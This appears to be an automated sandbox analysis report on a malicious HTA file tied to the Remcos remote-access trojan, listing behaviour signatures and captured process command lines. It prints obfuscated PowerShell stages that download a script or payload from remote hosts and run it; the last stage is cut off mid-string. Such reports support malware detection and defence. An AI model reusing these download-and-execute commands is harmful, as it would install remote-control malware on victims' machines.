Analysis Overview
SHA256
f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46
Threat Level: Known bad
The file accdfe7a24bcb621a1dade4ab39eddb2.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Evasion via Device Credential Deployment
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-07 06:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-07 06:55
Reported
2024-08-07 06:57
Platform
win7-20240705-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\accdfe7a24bcb621a1dade4ab39eddb2.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ajptgllb.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA1A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDA19.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷LwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cgB2⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷dwBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bu⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷LgBj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷cg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YgBz⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷agBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷ZQBi⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bgB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB3⤏ ꒼ ⛲ ⫰ 〷C0⤏ ꒼ ⛲ ⫰ 〷TwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷VwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgB5⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷ew⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷dwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBE⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dwBu⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷R⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQ⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷aw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷fQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BX⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷aQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LQBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷JwBG⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bwB3⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bm⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷ZwBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBu⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷ZQBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷UwB5⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷LgBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷RQBu⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷bwBk⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷Og⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷FU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Dg⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cgB0⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷8⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷QgBB⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷RQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷XwBT⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷QQBS⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷+⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷RgBs⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷P⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷UwBF⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷Bf⤏ ꒼ ⛲ ⫰ 〷EU⤏ ꒼ ⛲ ⫰ 〷TgBE⤏ ꒼ ⛲ ⫰ 〷D4⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷Ek⤏ 